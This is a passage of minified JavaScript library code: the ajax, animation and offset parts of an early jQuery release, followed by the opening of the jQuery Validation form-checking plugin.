this.name&&!this.disabled&&(this.checked||ub.test(this.nodeName)||vb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:A.XMLHttpRequest&&(A.location.protocol!=="file:"||!A.ActiveXObject)?function(){return new A.XMLHttpRequest}:function(){try{return new A.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&e.success.call(k,o,i,x);e.global&&f("ajaxSuccess",[x,e])}function d(){e.complete&&e.complete.call(k,x,i);e.global&&f("ajaxComplete",[x,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),j,i,o,k=a&&a.context||e,n=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(n==="GET")N.test(e.url)||(e.url+=(ka.test(e.url)?"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||N.test(e.url))){j=e.jsonpCallback||"jsonp"+sb++;if(e.data)e.data=(e.data+"").replace(N,"="+j+"$1");e.url=e.url.replace(N,"="+j+"$1");e.dataType="script";A[j]=A[j]||function(q){o=q;b();d();A[j]=w;try{delete A[j]}catch(p){}z&&z.removeChild(C)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===false&&n==="GET"){var r=J(),u=e.url.replace(wb,"$1_="+r+"$2");e.url=u+(u===e.url?(ka.test(e.url)?"&":"?")+"_="+r:"")}if(e.data&&n==="GET")e.url+=(ka.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&c.event.trigger("ajaxStart");r=(r=xb.exec(e.url))&&(r[1]&&r[1]!==location.protocol||r[2]!==location.host);if(e.dataType==="script"&&n==="GET"&&r){var z=s.getElementsByTagName("head")[0]||s.documentElement,C=s.createElement("script");C.src=e.url;if(e.scriptCharset)C.charset=e.scriptCharset;if(!j){var B=false;C.onload=C.onreadystatechange=function(){if(!B&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){B=true;b();d();C.onload=C.onreadystatechange=null;z&&C.parentNode&&z.removeChild(C)}}}z.insertBefore(C,z.firstChild);return w}var E=false,x=e.xhr();if(x){e.username?x.open(n,e.url,e.async,e.username,e.password):x.open(n,e.url,e.async);try{if(e.data||a&&a.contentType)x.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&x.setRequestHeader("If-Modified-Since",c.lastModified[e.url]);c.etag[e.url]&&x.setRequestHeader("If-None-Match",c.etag[e.url])}r||x.setRequestHeader("X-Requested-With","XMLHttpRequest");x.setRequestHeader("Accept",e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(ga){}if(e.beforeSend&&e.beforeSend.call(k,x,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");x.abort();return false}e.global&&f("ajaxSend",[x,e]);var g=x.onreadystatechange=function(q){if(!x||x.readyState===0||q==="abort"){E||d();E=true;if(x)x.onreadystatechange=c.noop}else if(!E&&x&&(x.readyState===4||q==="timeout")){E=true;x.onreadystatechange=c.noop;i=q==="timeout"?"timeout":!c.httpSuccess(x)?"error":e.ifModified&&c.httpNotModified(x,e.url)?"notmodified":"success";var p;if(i==="success")try{o=c.httpData(x,e.dataType,e)}catch(v){i="parsererror";p=v}if(i==="success"||i==="notmodified")j||b();else c.handleError(e,x,i,p);d();q==="timeout"&&x.abort();if(e.async)x=null}};try{var h=x.abort;x.abort=function(){x&&h.call(x);g("abort")}}catch(l){}e.async&&e.timeout>0&&setTimeout(function(){x&&!E&&g("timeout")},e.timeout);try{x.send(n==="POST"||n==="PUT"||n==="DELETE"?e.data:null)}catch(m){c.handleError(e,x,null,m);d()}e.async||g();return x}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(i,o){if(c.isArray(o))c.each(o,function(k,n){b||/\[\]$/.test(i)?f(i,n):d(i+"["+(typeof n==="object"||c.isArray(n)?k:"")+"]",n)});else!b&&o!=null&&typeof o==="object"?c.each(o,function(k,n){d(i+"["+k+"]",n)}):f(i,o)}function f(i,o){o=c.isFunction(o)?o():o;e[e.length]=encodeURIComponent(i)+"="+encodeURIComponent(o)}var e=[];if(b===w)b=c.ajaxSettings.traditional;if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var j in a)d(j,a[j]);return e.join("&").replace(yb,"+")}});var la={},Ab=/toggle|show|hide/,Bb=/^([+-]=)?([\d+-.]+)(.*)$/,W,va=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(la[d])f=la[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();la[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var j=c.extend({},e),i,o=this.nodeType===1&&c(this).is(":hidden"),k=this;for(i in a){var n=i.replace(ia,ja);if(i!==n){a[n]=a[i];delete a[i];i=n}if(a[i]==="hide"&&o||a[i]==="show"&&!o)return j.complete.call(this);if((i==="height"||i==="width")&&this.style){j.display=c.css(this,"display");j.overflow=this.style.overflow}if(c.isArray(a[i])){(j.specialEasing=j.specialEasing||{})[i]=a[i][1];a[i]=a[i][0]}}if(j.overflow!=null)this.style.overflow="hidden";j.curAnim=c.extend({},a);c.each(a,function(r,u){var z=new c.fx(k,j,r);if(Ab.test(u))z[u==="toggle"?o?"show":"hide":u](a);else{var C=Bb.exec(u),B=z.cur(true)||0;if(C){u=parseFloat(C[2]);var E=C[3]||"px";if(E!=="px"){k.style[r]=(u||1)+E;B=(u||1)/z.cur(true)*B;k.style[r]=B+E}if(C[1])u=(C[1]==="-="?-1:1)*u+B;z.custom(B,u,E)}else z.custom(B,u,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration==="number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(j){return e.step(j)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in s.documentElement?function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=this[0];if(a)return this.each(function(r){c.offset.setOffset(this,a,r)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=b,e=b.ownerDocument,j,i=e.documentElement,o=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var k=b.offsetTop,n=b.offsetLeft;(b=b.parentNode)&&b!==o&&b!==i;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;j=e?e.getComputedStyle(b,null):b.currentStyle;k-=b.scrollTop;n-=b.scrollLeft;if(b===d){k+=b.offsetTop;n+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&j.overflow!=="visible"){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=j}if(f.position==="relative"||f.position==="static"){k+=o.offsetTop;n+=o.offsetLeft}if(c.offset.supportsFixedPosition&&f.position==="fixed"){k+=Math.max(i.scrollTop,o.scrollTop);n+=Math.max(i.scrollLeft,o.scrollLeft)}return{top:k,left:n}};c.offset={initialize:function(){var a=s.body,b=s.createElement("div"),d,f,e,j=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";a.insertBefore(b,a.firstChild);d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==j;a.removeChild(b);c.offset.initialize=c.noop},bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),j=parseInt(c.curCSS(a,"top",true),10)||0,i=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,d,e);d={top:b.top-e.top+j,left:b.left-e.left+i};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-
f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||s.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],j;if(!e)return null;if(f!==w)return this.each(function(){if(j=wa(this))j.scrollTo(!a?f:c(j).scrollLeft(),a?f:c(j).scrollTop());else this[d]=f});else return(j=wa(e))?"pageXOffset"in j?j[a?"pageYOffset":"pageXOffset"]:c.support.boxModel&&j.document.documentElement[d]||j.document.body[d]:e[d]}});c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in
e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);;(function($){$.extend($.fn,{validate:function(options){if(!this.length){options&&options.debug&&window.console&&console.warn("nothing selected, can't validate, returning nothing");return;}var validator=$.data(this[0],'validator');if(validator){return validator;}validator=new $.validator(options,this[0]);$.data(this[0],'validator',validator);if(validator.settings.onsubmit){this.find("input, button").filter(".cancel").click(function(){validator.cancelSubmit=true;});if(validator.settings.submitHandler){this.find("input, button").filter(":submit").click(function(){validator.submitButton=this;});}this.submit(function(event){if(validator.settings.debug)event.preventDefault();function handle(){if(validator.settings.submitHandler){if(validator.submitButton){var hidden=$("<input type='hidden'/>").attr("name",validator.submitButton.name).val(validator.submitButton.value).appendTo(validator.currentForm);}validator.settings.submitHandler.call(validator,validator.currentForm);if(validator.submitButton){hidden.remove();}return false;}return true;}if(validator.cancelSubmit){validator.cancelSubmit=false;return handle();}if(validator.form()){if(validator.pendingRequest){validator.formSubmitted=true;return false;}return handle();}else{validator.focusInvalid();return false;}});}return validator;},valid:function(){if($(this[0]).is('form')){return this.validate().form();}else{var valid=true;var validator=$(this[0].form).validate();this.each(function(){valid&=validator.element(this);});return valid;}},removeAttrs:function(attributes){var result={},$element=this;$.each(attributes.split(/\s/),function(index,value){result[value]=$element.attr(value);$element.removeAttr(value);});return result;},rules:function(command,argument){var element=this[0];if(command){var settings=$.data(element.form,'validator').settings;var staticRules=settings.rules;var existingRules=$.validator.staticRules(element);switch(command){case"add":$.extend(existingRules,$.validator.normalizeRule(argument));staticRules[element.name]=existingRules;if(argument.messages)settings.messages[element.name]=$.extend(settings.messages[element.name],argument.messages);break;case"remove":if(!argument){delete staticRules[element.name];return existingRules;}var filtered={};$.each(argument.split(/\s/),function(index,method){filtered[method]=existingRules[method];delete existingRules[method];});return filtered;}}var data=$.validator.normalizeRules($.extend({},$.validator.metadataRules(element),$.validator.classRules(element),$.validator.attributeRules(element),$.validator.staticRules(element)),element);if(data.required){var param=data.required;delete data.required;data=$.extend({required:param},data);}return data;}});$.extend($.expr[":"],{blank:function(a){return!$.trim(""+a.value);},filled:function(a){return!!$.trim(""+a.value);},unchecked:function(a){return!a.checked;}});$.validator=function(options,form){this.settings=$.extend(true,{},$.validator.defaults,options);this.currentForm=form;this.init();};$.validator.format=function(source,params){if(arguments.length==1)return function(){var args=$.makeArray(arguments);args.unshift(source);return $.validator.format.apply(this,args);};if(arguments.length>2&&params.constructor!=Array){params=$.makeArray(arguments).slice(1);}if(params.constructor!=Array){params=[params];}$.each(params,function(i,n){source=source.replace(new RegExp("\\{"+i+"\\}","g"),n);});return source;};$.extend($.validator,{defaults:{messages:{},groups:{},rules:{},errorClass:"error",validClass:"valid",errorElement:"label",focusInvalid:true,errorContainer:$([]),errorLabelContainer:$([]),onsubmit:true,ignore:[],ignoreTitle:false,onfocusin:function(element){this.lastActive=element;if(this.settings.focusCleanup&&!this.blockFocusCleanup){this.settings.unhighlight&&this.settings.unhighlight.call(this,element,this.settings.errorClass,this.settings.validClass);this.errorsFor(element).hide();}},onfocusout:function(element){if(!this.checkable(element)&&(element.name in this.submitted||!this.optional(element))){this.element(element);}},onkeyup:function(element){if(element.name in this.submitted||element==this.lastElement){this.element(element);}},onclick:function(element){if(element.name in this.submitted)this.element(element);else if(element.parentNode.name in this.submitted)this.element(element.parentNode);},highlight:function(element,errorClass,validClass){$(element).addClass(errorClass).removeClass(validClass);},unhighlight:function(element,errorClass,validClass){$(element).removeClass(errorClass).addClass(validClass);}},setDefaults:function(settings){$.extend($.validator.defaults,settings);},messages:{required:"This field is required.",remote:"Please fix this field.",email:"Please enter a valid email address.",url:"Please enter a valid URL.",date:"Please enter a valid date.",dateISO:"Please enter a valid date (ISO).",number:"Please enter a valid number.",digits:"Please enter only digits.",creditcard:"Please enter a valid credit card number.",equalTo:"Please enter the same value again.",accept:"Please enter a value with a valid extension.",maxlength:$.validator.format("Please enter no more than {0} characters."),minlength:$.validator.format("Please enter at least {0} characters."),rangelength:$.validator.format("Please enter a value between {0} and {1} characters long."),range:$.validator.format("Please enter a value between {0} and {1}."),max:$.validator.format("Please enter a value less than or equal to {0}."),min:$.validator.format("Please enter a value greater than or equal to {0}.")},autoCreateRanges:false,prototype:{init:function(){this.labelContainer=$(this.settings.errorLabelContainer);this.errorContext=this.labelContainer.length&&this.labelContainer||$(this.currentForm);this.containers=$(this.settings.errorContainer).add(this.settings.errorLabelContainer);this.submitted={};this.valueCache={};this.pendingRequest=0;this.pending={};this.invalid={};this.reset();var groups=(this.groups={});$.each(this.settings.groups,function(key,value){$.each(value.split(/\s/),function(index,name){groups[name]=key;});});var rules=this.settings.rules;$.each(rules,function(key,value){rules[key]=$.validator.normalizeRule(value);});function delegate(event){var validator=$.data(this[0].form,"validator"),eventType="on"+event.type.replace(/^validate/,"");validator.settings[eventType]&&validator.settings[eventType].call(validator,this[0]);}$(this.currentForm).validateDelegate(":text, :password, :file, select, textarea","focusin focusout keyup",delegate).validateDelegate(":radio, :checkbox, select, option","click",delegate);if(this.settings.invalidHandler)$(this.currentForm).bind("invalid-form.validate",this.settings.invalidHandler);},form:function(){this.checkForm();$.extend(this.submitted,this.errorMap);this.invalid=$.extend({},this.errorMap);if(!this.valid())$(this.currentForm).triggerHandler("invalid-form",[this]);this.showErrors();return this.valid();},checkForm:function(){this.prepareForm();for(var i=0,elements=(this.currentElements=this.elements());elements[i];i++){this.check(elements[i]);}return this.valid();},element:function(element){element=this.clean(element);this.lastElement=element;this.prepareElement(element);this.currentElements=$(element);var result=this.check(element);if(result){delete this.invalid[element.name];}else{this.invalid[element.name]=true;}if(!this.numberOfInvalids()){this.toHide=this.toHide.add(this.containers);}this.showErrors();return result;},showErrors:function(errors){if(errors){$.extend(this.errorMap,errors);this.errorList=[];for(var name in errors){this.errorList.push({message:errors[name],element:this.findByName(name)[0]});}this.successList=$.grep(this.successList,function(element){return!(element.name in errors);});}this.settings.showErrors?this.settings.showErrors.call(this,this.errorMap,this.errorList):this.defaultShowErrors();},resetForm:function(){if($.fn.resetForm)$(this.currentForm).resetForm();this.submitted={};this.prepareForm();this.hideErrors();this.elements().removeClass(this.settings.errorClass);},numberOfInvalids:function(){return this.objectLength(this.invalid);},objectLength:function(obj){var count=0;for(var i in obj)count++;return count;},hideErrors:function(){this.addWrapper(this.toHide).hide();},valid:function(){return this.size()==0;},size:function(){return this.errorList.length;},focusInvalid:function(){if(this.settings.focusInvalid){try{$(this.findLastActive()||this.errorList.length&&this.errorList[0].element||[]).filter(":visible").focus().trigger("focusin");}catch(e){}}},findLastActive:function(){var lastActive=this.lastActive;return lastActive&&$.grep(this.errorList,function(n){return n.element.name==lastActive.name;}).length==1&&lastActive;},elements:function(){var validator=this,rulesCache={};return $([]).add(this.currentForm.elements).filter(":input").not(":submit, :reset, :image, [disabled]").not(this.settings.ignore).filter(function(){!this.name&&validator.settings.debug&&window.console&&console.error("%o has no name assigned",this);if(this.name in rulesCache||!validator.objectLength($(this).rules()))return false;rulesCache[this.name]=true;return true;});},clean:function(selector){return $(selector)[0];},errors:function(){return $(this.settings.errorElement+"."+this.settings.errorClass,this.errorContext);},reset:function(){this.successList=[];this.errorList=[];this.errorMap={};this.toShow=$([]);this.toHide=$([]);this.currentElements=$([]);},prepareForm:function(){this.reset();this.toHide=this.errors().add(this.containers);},prepareElement:function(element){this.reset();this.toHide=this.errorsFor(element);},check:function(element){element=this.clean(element);if(this.checkable(element)){element=this.findByName(element.name)[0];}var rules=$(element).rules();var dependencyMismatch=false;for(method in rules){var rule={method:method,parameters:rules[method]};try{var result=$.validator.methods[method].call(this,element.value.replace(/\r/g,""),element,rule.parameters);if(result=="dependency-mismatch"){dependencyMismatch=true;continue;}dependencyMismatch=false;if(result=="pending"){this.toHide=this.toHide.not(this.errorsFor(element));return;}if(!result){this.formatAndAdd(element,rule);return false;}}catch(e){this.settings.debug&&window.console&&console.log("exception occured when checking element "+element.id
+", check the '"+rule.method+"' method",e);throw e;}}if(dependencyMismatch)return;if(this.objectLength(rules))this.successList.push(element);return true;},customMetaMessage:function(element,method){if(!$.metadata)return;var meta=this.settings.meta?$(element).metadata()[this.settings.meta]:$(element).metadata();return meta&&meta.messages&&meta.messages[method];},customMessage:function(name,method){var m=this.settings.messages[name];return m&&(m.constructor==String?m:m[method]);},findDefined:function(){for(var i=0;i<arguments.length;i++){if(arguments[i]!==undefined)return arguments[i];}return undefined;},defaultMessage:function(element,method){return this.findDefined(this.customMessage(element.name,method),this.customMetaMessage(element,method),!this.settings.ignoreTitle&&element.title||undefined,$.validator.messages[method],"<strong>Warning: No message defined for "+element.name+"</strong>");},formatAndAdd:function(element,rule){var message=this.defaultMessage(element,rule.method),theregex=/\$?\{(\d+)\}/g;if(typeof message=="function"){message=message.call(this,rule.parameters,element);}else if(theregex.test(message)){message=jQuery.format(message.replace(theregex,'{$1}'),rule.parameters);}this.errorList.push({message:message,element:element});this.errorMap[element.name]=message;this.submitted[element.name]=message;},addWrapper:function(toToggle){if(this.settings.wrapper)toToggle=toToggle.add(toToggle.parent(this.settings.wrapper));return toToggle;},defaultShowErrors:function(){for(var i=0;this.errorList[i];i++){var error=this.errorList[i];this.settings.highlight&&this.settings.highlight.call(this,error.element,this.settings.errorClass,this.settings.validClass);this.showLabel(error.element,error.message);}if(this.errorList.length){this.toShow=this.toShow.add(this.containers);}if(this.settings.success){for(var i=0;this.successList[i];i++){this.showLabel(this.successList[i]);}}if(this.settings.unhighlight){for(var i=0,elements=this.validElements();elements[i];i++){this.settings.unhighlight.call(this,elements[i],this.settings.errorClass,this.settings.validClass);}}this.toHide=this.toHide.not(this.toShow);this.hideErrors();this.addWrapper(this.toShow).show();},validElements:function(){return this.currentElements.not(this.invalidElements());},invalidElements:function(){return $(this.errorList).map(function(){return this.element;});},showLabel:function(element,message){var label=this.errorsFor(element);if(label.length){label.removeClass().addClass(this.settings.errorClass);label.attr("generated")&&label.html(message);}else{label=$("<"+this.settings.errorElement+"/>").attr({"for":this.idOrName(element),generated:true}).addClass(this.settings.errorClass).html(message||"");if(this.settings.wrapper){label=label.hide().show().wrap("<"+this.settings.wrapper+"/>").parent();}if(!this.labelContainer.append(label).length)this.settings.errorPlacement?this.settings.errorPlacement(label,$(element)):label.insertAfter(element);}if(!message&&this.settings.success){label.text("");typeof this.settings.success=="string"?label.addClass(this.settings.success):this.settings.success(label);}this.toShow=this.toShow.add(label);},errorsFor:function(element){var name=this.idOrName(element);return this.errors().filter(function(){return $(this).attr('for')==name;});},idOrName:function(element){return this.groups[element.name]||(this.checkable(element)?element.name:element.id||element.name);},checkable:function(element){return/radio|checkbox/i.test(element.type);},findByName:function(name){var form=this.currentForm;return $(document.getElementsByName(name)).map(function(index,element){return element.form==form&&element.name==name&&element||null;});},getLength:function(value,element){switch(element.nodeName.toLowerCase()){case'select':return $("option:selected",element).length;case'input':if(this.checkable(element))return this.findByName(element.name).filter(':checked').length;}return value.length;},depend:function(param,element){return this.dependTypes[typeof param]?this.dependTypes[typeof param](param,element):true;},dependTypes:{"boolean":function(param,element){return param;},"string":function(param,element){return!!$(param,element.form).length;},"function":function(param,element){return param(element);}},optional:function(element){return!$.validator.methods.required.call(this,$.trim(element.value),element)&&"dependency-mismatch";},startRequest:function(element){if(!this.pending[element.name]){this.pendingRequest++;this.pending[element.name]=true;}},stopRequest:function(element,valid){this.pendingRequest--;if(this.pendingRequest<0)this.pendingRequest=0;delete this.pending[element.name];if(valid&&this.pendingRequest==0&&this.formSubmitted&&this.form()){$(this.currentForm).submit();this.formSubmitted=false;}else if(!valid&&this.pendingRequest==0&&this.formSubmitted){$(this.currentForm).triggerHandler("invalid-form",[this]);this.formSubmitted=false;}},previousValue:function(element){return 